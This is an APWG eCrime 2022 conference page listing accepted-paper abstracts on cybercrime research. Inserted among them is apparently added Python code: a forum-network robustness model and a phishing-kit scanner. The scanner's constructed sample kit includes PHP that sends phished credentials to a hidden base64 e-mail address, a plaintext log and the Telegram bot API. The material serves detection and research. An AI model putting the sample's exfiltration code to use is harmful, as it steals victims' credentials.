The 2022 edition of the Symposium on Electronic Crime Research (eCrime 2022) consists of a three day program composed of keynote presentations, technical and practical sessions, and interactive panels.
An overarching goal of these symposia is bringing together academic researchers, industry security practitioners, and law enforcement to discuss and exchange ideas, experiences and lessons learnt combating cybercrime.
Submission topics include but are not limited to:
- Detecting and/or mitigating eCrime (e.g. online fraud, malware, phishing, ransomware, etc.)
- Measuring and modeling of eCrime
- Economics of online crime
- eCrime delivery strategies and countermeasures (e.g. spam, mobile apps, social engineering, etc.)
- Behavioral aspects of cybercrime victimization and prevention
- Security assessments of mobile devices
- Public Policy and Law for online crime
Submission: September 9
Notification: October 21
Camera ready: November 18
Conference: Nov 30-Dec 2
Accepted Papers for the Symposium on Electronic Crime Research 2022
Money Over Morals: A Business Analysis of Conti Ransomware
Ian W. Gray (New York University)
Vlad Cuiujuclu (Flashpoint)
Benjamin Brown (University of Michigan)
Damon McCoy (New York University)
Ransomware operations have evolved from conducting unsophisticated attacks into highly coordinated cybercrime syndicates that regularly extort millions of dollars in a single attack. Despite dominating headlines and crippling businesses across the globe, there is relatively little in-depth research into the modern structure and economics of ransomware operations.
In this paper, we leverage leaked chat messages to provide an in-depth empirical analysis of Conti, one of the largest ransomware groups. By analyzing these chat messages, we construct a picture of Conti’s operations as a highly-profitable business, from profit structures to employee recruitment and roles. We present novel methodologies to trace ransom payments, identifying over $100 million in likely ransom payments to Conti and its predecessor — over five times as much as in previous public datasets. As part of our work, we publish a dataset of 666 labeled Bitcoin addresses related to Conti and an additional 75 Bitcoin addresses of likely ransom payments. Future work can leverage this case study to more effectively trace — and ultimately counteract — ransomware activity.
Exploring Social Network of Trust Across Major Crime Types in an Underground Forum
Dalyapraz Manatova (Indiana University Bloomington)
Dewesha Sharma (Indiana University Bloomington)
Sagar Samtani (Indiana University)
L. Jean Camp (Indiana University)
Underground markets support e-crime by providing a place where merchants and buyers trade assets for a price utilizing various digital currencies, payment providers, and wallets. The anonymity of these marketplaces and incentives to avoid penalties for criminal activity create significant challenges in studying trust in these ecosystems. Underground forums are clearinghouses where deals can be arranged, and services can be identified as vendors and customers engage. Such forums may be open and may not clear transactions themselves, but they nonetheless offer opportunities for entry, entrepreneurship, and customer or product discovery, serving as critical intermediaries for the marketplaces and enabling new entrants to establish trust and actors in one market to reach out to another.
The empirical evaluation of interactions in such forums illuminates how collaborative networks form, interact, socialize, and exchange knowledge. To contribute to understanding online crime, we offer an empirical analysis of an underground forum. Specifically, we examine interactions in the social network as a whole and those components of the network that support three major types of crime: traditional crimes that occur away from keyboards, transitional crimes that have both offline and online instantiations, and entirely online new crimes. We compare and contrast the network structure of these three types and document the interactions between their social networks. The results suggest that although communities follow the small world effect, identifying and removing highly connected moderators or prolific contributors will not harm any of these three communities or the network unless a significant percentage of the network is removed. By further observing the structural patterns, we find that transitional crime actors tend to cluster more compared to the other two crimes while having the highest density.
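The robustness claim above (removing highly connected moderators or prolific contributors does not fragment the community) is a targeted-node-removal test. The following is an added example, not the paper's code or data: it builds a constructed interaction network of ring-connected members plus a few high-degree moderators, then compares the largest connected component under degree-ranked removal and random removal. Member count, rewiring probability and moderator reach are assumptions.

```python
"""Targeted-removal robustness of a forum interaction network (added example).

Builds a constructed small-world network of ordinary members plus a few
high-degree moderators, then measures how the largest connected component
shrinks as the most connected nodes are removed first, versus random removal.
All parameters (member count, rewiring probability, moderator reach) are assumptions."""
import random
from collections import deque


def build_forum_graph(n_members=200, n_moderators=3, shortcut_p=0.1,
                      moderator_reach=0.3, seed=1):
    """Return an undirected graph as {node: set(neighbours)}.

    Members sit on a ring (Watts-Strogatz style): each member talks to its ring
    neighbours at distance 1 and 2, and every distance-2 edge is rewired to a
    random member with probability shortcut_p. Distance-1 ring edges are never
    rewired, so the member subgraph stays connected. Moderators are extra nodes
    that interact with a random moderator_reach fraction of the members.
    """
    rng = random.Random(seed)
    adj = {i: set() for i in range(n_members + n_moderators)}

    def link(a, b):
        if a != b:
            adj[a].add(b)
            adj[b].add(a)

    for i in range(n_members):
        link(i, (i + 1) % n_members)            # fixed ring edge
        j = (i + 2) % n_members
        if rng.random() < shortcut_p:           # occasional long-range tie
            j = rng.randrange(n_members)
        link(i, j)
    for m in range(n_members, n_members + n_moderators):
        for member in rng.sample(range(n_members), int(moderator_reach * n_members)):
            link(m, member)
    return adj


def largest_component_size(adj, removed=frozenset()):
    """Size of the largest connected component once the nodes in `removed` are deleted."""
    seen = set(removed)
    best = 0
    for start in adj:
        if start in seen:
            continue
        seen.add(start)
        queue, size = deque([start]), 0
        while queue:
            node = queue.popleft()
            size += 1
            for nb in adj[node]:
                if nb not in seen:
                    seen.add(nb)
                    queue.append(nb)
        best = max(best, size)
    return best


def removal_order_by_degree(adj):
    """Attack order: most connected nodes (moderators, prolific posters) first."""
    return sorted(adj, key=lambda n: len(adj[n]), reverse=True)


def removal_order_random(adj, seed=1):
    order = list(adj)
    random.Random(seed).shuffle(order)
    return order


def robustness_curve(adj, order, fractions):
    """Largest-component size after removing the first f*N nodes of `order`, per f."""
    n = len(adj)
    return [largest_component_size(adj, frozenset(order[:int(f * n)])) for f in fractions]


def average_path_length(adj):
    """Mean BFS distance over all connected ordered pairs (the small-world check)."""
    total = pairs = 0
    for src in adj:
        dist = {src: 0}
        queue = deque([src])
        while queue:
            node = queue.popleft()
            for nb in adj[node]:
                if nb not in dist:
                    dist[nb] = dist[node] + 1
                    queue.append(nb)
        total += sum(dist.values())
        pairs += len(dist) - 1
    return total / pairs if pairs else 0.0


if __name__ == "__main__":
    g = build_forum_graph()
    fr = [0.0, 0.015, 0.05, 0.1, 0.25, 0.5]
    print("average path length:", round(average_path_length(g), 2))
    for label, order in (("by degree", removal_order_by_degree(g)),
                         ("random   ", removal_order_random(g))):
        print(label, [round(s / len(g), 2) for s in robustness_curve(g, order, fr)])
```

Removing only the three moderators leaves every member reachable through the ring, which is the situation the abstract describes; the curve only collapses once a large fraction of members themselves is gone. On a real forum dump the same functions apply to the observed reply graph in place of the constructed one.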
Rationalising the ransom demands of cyber criminals: An analysis of ransomware investigation reports
Tom Meurs (University of Twente)
Marianne Junger (University of Twente)
Erik Tews (University of Twente)
Abhishta Abhishta (University of Twente)
In recent years, ransomware attacks have led to disastrous consequences for victims, not just due to the ransom payment amount but also due to the recovery costs associated with these attacks. So far only a few empirical studies have analysed the financial impact of ransomware attacks. This study aims to rationalise the ransom demands associated with these attacks. To do so, we evaluate the factors that determine the ransom requested by attackers. We build a dataset based on 453 ransomware attack investigation reports in the Netherlands reported to the Dutch Police between 2019 and 2022. Using the rational choice model of crime (RCM) and crime scripting, we hypothesise that the effort of an attacker, victim characteristics and context variables influence not only the ransom demanded by an attacker but also the financial losses reported by victims. We use generalised linear models to evaluate and quantify this influence. Our results show that attacker effort, such as using ransomware as a service (RaaS), and victim characteristics, such as industry sector, contribute to the ransom requested by attackers and the financial losses reported by victims. We also show that the availability of recoverable backups explains the likelihood of victims paying the ransom. Our methodology and results lay the groundwork for future large-scale empirical studies and add to our understanding of attacker and victim behaviour.
THREAT/crawl: a Trainable, Highly-Reusable, and Extensible Automated Method and Tool to Crawl Criminal Underground Forums
Michele Campobasso (Eindhoven University of Technology)
Luca Allodi (Eindhoven University of Technology)
Collecting data on underground criminal communities is highly valuable both for security research and security operations. Unfortunately these communities live within a constellation of diverse online forums that are difficult to infiltrate, may adopt countermeasures that detect and block crawling, and require the development of ad-hoc scrapers for each different community, making the endeavour increasingly technically challenging, and potentially expensive. To address this problem we propose THREAT/crawl, a method and prototype tool for a highly reusable crawler that can learn a wide range of (arbitrary) forum structures, can remain under the radar during the crawling activity and can be extended and configured at the user's will. We showcase the tool's capabilities and provide an initial evaluation of our prototype against a range of active, live, underground communities.
Leaky Kits: The Increased Risk of Data Exposure from Phishing Kits
Bhaskar Tejaswi (Concordia University)
Nayanamana Samarasinghe (Concordia University)
Sajjad Pourali (Concordia University)
Mohammad Mannan (Concordia University)
Amr Youssef (Concordia University)
Phishing kits allow adversaries with little or no technical experience to launch phishing websites in a short time. Past research has found such phishing kits that contain backdoors (e.g., obfuscated email addresses), which are intentionally added by the kit developers to obtain the phished data. In this work, we augment prior research by exploring several ways in which security flaws in phishing kits make the victim data accessible to a wider set of adversaries beyond the kit deployers and kit developers. We implement an automated framework for kit collection and analysis, which includes a custom command-line PHP execution tool (for dynamic analysis) along with other open-source tools. Our analysis focuses on finding backdoors (e.g., obfuscated email address, command injection), measuring the extent of disclosure of sensitive information (e.g., via exposed plaintext files, hardcoded Telegram bot tokens, hardcoded admin console passwords) and detecting security vulnerabilities in phishing kits. We analyze 4238 distinct phishing kits (from a set of 26,281 compressed files collected from several sources over a span of 15 months), each with a unique SHA-1 hash value. We found that 3.9% of the analyzed kits contained at least one form of backdoor. We also found hardcoded admin console passwords and API keys used to access third party services, in 8.3% and 16% of the analyzed kits, respectively. In addition, 15.8% of the analyzed kits wrote stolen information (PII) of users in plaintext files; 5.6% of kits did not restrict external access to these plaintext files, leading to exposure of sensitive phished data (e.g., 178,504 passwords, 133,248 email addresses, 1253 credit card numbers).
Furthermore, 11.7% of the analyzed kits contained hardcoded Telegram bots; we obtained invite links to join Telegram chats in 0.5% of kits, and found them to expose chat messages containing sensitive PII of victims (e.g., 73,342 passwords, 141,095 email addresses, 3584 credit card numbers). We also found that 64% of the kits are affected by security vulnerabilities (e.g., insecure file operations, SQL injection), which can be abused to further expose user data.
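The three exposure classes the abstract enumerates (a developer backdoor hidden as an obfuscated e-mail recipient, a hardcoded Telegram bot token, and phished data appended to a web-reachable plaintext file) can each be triaged statically before any dynamic PHP execution. The scanner below is an added example, not the paper's framework; the kit files, file names and addresses it inspects are constructed, and the Telegram token shape it matches is the publicly documented `<bot id>:<35-character secret>` format.

```python
"""Static triage of a phishing kit's PHP source (added example, not the paper's tool).

Flags: base64-obfuscated e-mail recipients (developer backdoors), hardcoded
Telegram bot tokens, and writes of phished data to flat files a web server
would serve. The sample kit below is constructed; names are hypothetical."""
import base64
import re

# Constructed sample kit, path -> PHP source.
SAMPLE_KIT = {
    "login.php": r'''<?php
$to = "operator@example.com";
$msg = "user: " . $_POST["email"] . " pass: " . $_POST["password"];
mail($to, "New login", $msg);
// second recipient hidden from the kit deployer behind base64
mail(base64_decode("ZGV2LWJhY2tkb29yQGV4YW1wbGUubmV0"), "copy", $msg);
file_put_contents("rezult.txt", $msg . "\n", FILE_APPEND);
''',
    "tg.php": r'''<?php
$token = "123456789:AAHf9kLmn0pQrStUvWxYz1234567890abcd";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=1&text=" . urlencode($msg));
''',
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Telegram bot tokens are "<numeric bot id>:<35-character secret>".
TG_TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
# Phished data written to a flat file inside the web root (txt/log/csv).
LOG_WRITE_RE = re.compile(
    r"\b(?:file_put_contents|fopen)\s*\(\s*['\"]([^'\"]+\.(?:txt|log|csv))['\"]")


def find_plain_emails(src):
    return set(EMAIL_RE.findall(src))


def find_obfuscated_emails(src):
    """Decode every base64-looking literal and keep those that hide an e-mail address."""
    found = set()
    for m in B64_RE.finditer(src):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip
        found.update(EMAIL_RE.findall(decoded))
    return found


def scan_kit(files):
    """Aggregate findings over one kit; `files` maps path -> PHP source."""
    report = {"plain_emails": set(), "obfuscated_emails": set(),
              "telegram_tokens": set(), "plaintext_logs": set(), "mail_calls": 0}
    for src in files.values():
        report["plain_emails"] |= find_plain_emails(src)
        report["obfuscated_emails"] |= find_obfuscated_emails(src)
        report["telegram_tokens"] |= set(TG_TOKEN_RE.findall(src))
        report["plaintext_logs"] |= set(LOG_WRITE_RE.findall(src))
        report["mail_calls"] += len(MAIL_CALL_RE.findall(src))
    # Backdoor heuristic: a hidden recipient that is not one of the visible operator addresses.
    report["backdoor_suspected"] = not report["obfuscated_emails"] <= report["plain_emails"]
    return report


if __name__ == "__main__":
    for key, value in scan_kit(SAMPLE_KIT).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Each hit maps to a concrete action: a hidden recipient means the kit exfiltrates to someone other than its deployer; a live bot token lets a defender enumerate and report the exfiltration channel; a plaintext log name is what to probe on a discovered phishing host to confirm (and get taken down) an open victim-data file. Static regexes miss recipients assembled at runtime, which is why the paper pairs this kind of check with PHP execution.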
The Challenges of Blockchain-Based Naming Systems for Malware Defenders
Audrey Randall (UC San Diego)
Wes Hardaker (USC/ISI)
Aaron Schulman (UC San Diego)
Stefan Savage (University of California, San Diego)
Geoffrey M. Voelker (UC San Diego)
Successful malware campaigns often rely on infected hosts’ ability to locate and contact C2 servers. Malware campaigns have often used DNS domains for this purpose, but DNS domains may be taken down by the registrar that sold them. In response to this threat, malware operators have begun using blockchain-based naming systems to store C2 server names. Blockchain naming systems are a threat to malware defenders because they are not subject to a centralized authority, such as a registrar, that can take down abused domains, either voluntarily or under legal pressure. In fact, blockchains are robust against a variety of interventions that work on DNS domains, which is bad news for defenders.
We analyze the ecosystem of blockchain naming systems and identify new locations for defenders to stage interventions against malware. In particular, we find that malware is obligated to use centralized or semi-centralized infrastructure to connect to blockchain naming systems and modify the records stored within. In fact, scattered interventions have already been staged against this centralized infrastructure: we present case studies of several such instances. We also present a study of how blockchain naming systems are currently abused by malware operators, and discuss the factors that would cause a blockchain naming system to become an unstoppable threat. We conclude that existing blockchain naming systems still provide opportunities for defenders to prevent malware from contacting its C2 servers.
“I don’t really give them piece of mind”: User Perceptions of Social Engineering Attacks
Lin Kyi (Carleton University)
Elizabeth Stobert (Carleton University)
How do end users understand social engineering attacks, and how do their perceptions of these attacks differ from reality? To investigate, we proposed a new social engineering attack framework, and ran two studies to examine exactly how and when users are misunderstanding social engineering attacks. In our first study, we conducted 30 qualitative interviews asking people about their understanding of and experiences with social engineering attacks. We found that confidence and accuracy are the two main factors affecting users’ knowledge of social engineering attacks. In our second study, we quantified how confidence and accuracy impact users’ perceptions at different stages of an attack. We found that users tend to be overconfident in their ability to understand social engineering attacks, but hold inaccurate beliefs. Participants had major misconceptions of what constitutes social engineering, and the risks of these attacks. Based on our results, we propose educational and design opportunities to match social engineering mitigation strategies to user perceptions of social engineering.
“Invest in crypto!”: An analysis of investment scam advertisements found in Bitcointalk
Gilberto Atondo Siu (University of Cambridge)
Alice Hutchings (University of Cambridge)
Marie Vasek (University College London)
Tyler Moore (The University of Tulsa)
This paper investigates the evolution of investment scam lures and scam-related keywords in the cryptocurrency online forum Bitcointalk over a period of 12 years. Our findings show a shift in scam-related keywords found within posts in the forum, where “Ponzi” was the most popular and most frequently mentioned in 2014 and 2018 and “HYIP” appeared more often in 2018 and 2021. We also identify that the financial principle is the tactic most likely to be used to lure people into investment scams from 2015 until 2017, coinciding with the period when “Ponzi” was the most commonly found keyword. This is followed by a transition to the authority and distraction principles from 2018 until 2022, which also coincides with the increase in popularity of “HYIP”.
We collect more than 17.8M posts from 399k threads from the forum from July 2010 until June 2022. Our longitudinal analysis shows the popularity transition between subforums and keywords across time. We design categorisation criteria and annotate 4,218 posts from 2,630 threads based on them. We then use the annotated sample to train four machine learning statistical models. We use the best performing model to classify all 281k English-language threads into four categories: overt scams, potential scams, scam comments and not investment scam related. We analyze the frequency changes of scam-related threads across the 12 year period and observe that overt and potential scams peaked in 2015 and 2018 respectively. We see that potential scams also increased during the COVID-19 pandemic. We use heuristics to pinpoint the types of cryptocurrencies most frequently used within scam advertisements. Bitcoin is most commonly found in potential scams while Ethereum appears more often than other cryptocurrencies in overt scams. We use machine learning classifiers to identify the scam actor types behind the posts categorised as overt and potential scams. We also classify the type of lure used by scammers. Our results indicate that the time principle is not a tactic used as frequently as expected. Finally, we observe the influence of the pandemic in the strategies used to lure victims, reflected in higher than expected use of the kindness principle in 2021 and 2022.
The Role of Extraversion in Phishing Victimisation: A Systematic Literature Review
Pablo López-Aguilar (APWG.EU & Universitat Rovira i Virgili)
Agusti Solanas (Universitat Rovira i Virgili & APWG.EU)
Constantinos Patsakis (University of Piraeus)
Over the last decade, phishing attacks have become preeminent and increasingly successful. Anti-phishing strategies focus on raising awareness and training users to identify risks. However, those strategies do not fully consider the psychological profile of each individual. We argue that maximising potential victims’ resilience requires additional protection strategies that focus on individual personality traits.
In this article, we concentrate on extraversion as a personality trait for which there is no consensus about its effect on susceptibility to phishing attacks. We implement a robust bibliographic analysis methodology and identify potentially relevant articles, which we screen and filter against inclusion and exclusion criteria. We report and analyse the findings of the 39 articles that fulfil all criteria and are deemed relevant to this research. Our analysis shows that, despite the positive correlation between extraversion and phishing susceptibility found in many studies, there is no consensus supported by a well-established psychological theory. Moreover, we identify a number of reasons justifying this lack of consensus, namely the use of non-representative samples, the non-consideration of contextual factors, and the use of self-reported personality tests, which lead to limited reproducibility and data inconsistencies.
Cryptocurrency Exchange Closure Revisited (Again)
Tyler Moore (University of Tulsa)
Arghya Mukherjee (University of Tulsa)
Exchanges serve an essential role in the cryptocurrency ecosystem. It is through exchanges that most people acquire Bitcoin and other cryptocurrencies, often avoiding the blockchain entirely. Because so many customers put their trust and financial resources in exchanges, it is no surprise that they have long been targets of cybercriminal actors. This paper examines 707 cryptocurrency exchanges operational from 2018-2021. We find that 30% of these exchanges subsequently shut down. Using regression and survival analysis, we investigate the factors that could precipitate the closure of exchanges. Consistent with prior work, we find evidence that experiencing security breaches is associated with closure. However, we find that the strongest effects are connected to how the exchange operates. Exchanges that only trade cryptocurrencies and not fiat face 7-9 times greater odds of shutting down than those that trade both. Meanwhile, exchanges that permit US customers or are hosted in OECD countries shut down more quickly, which suggests that the regulatory environment may affect exchange lifetimes.
General Chair: Guy-Vincent Jourdan, University of Ottawa
Program Chair: Laurin Weissinger, Fletcher School at Tufts / Yale University
Publication Chair: Moury Bidgoli, Accenture, APWG Research Fellow
About the Symposium on Electronic Crime Research (APWG eCrime)
The Symposium on Electronic Crime Research (APWG eCrime) was founded in 2006 as the eCrime Researchers Summit, conceived by APWG Secretary General Peter Cassidy as a comprehensive, multi-disciplinary venue to present basic and applied research into electronic crime and engaging every aspect of its evolution – as well as spotlighting technologies and techniques for cybercrime detection, response, forensics and prevention.
Since then, what had been initially a technology focused conference has incrementally expanded its focus to cover behavioral, social, economic, and legal / policy dimensions as well as technical aspects of cybercrime, following the interests of our correspondent investigators, the symposium’s managers as well as the APWG’s own directors and steering committee members.
Scores upon scores of papers exploring these dimensions of cybercrime at APWG eCrime have been published by the IEEE (APWG eCrime Research Papers) as well as by Taylor & Francis and the Association for Computing Machinery (in the very earliest years of the symposium).
With its multi-disciplinary approach, APWG eCrime every year brings together the most heterogeneous community of counter-eCrime researchers and industrial stakeholders to confer over the latest research, and to foster collaborations between the leading investigators in this still nascent field of cybercrime studies.
The power of that community, over the years, has been expressed in their contributions to research in academia and industry, cited in the papers above, their innovations for industry, and the globally scaled research projects they are organizing today, such as the PhishFarm browser block list latency measurement program that APWG eCrime-associated investigators are organizing in Australia: http://ecrimeresearch.org/phishfarm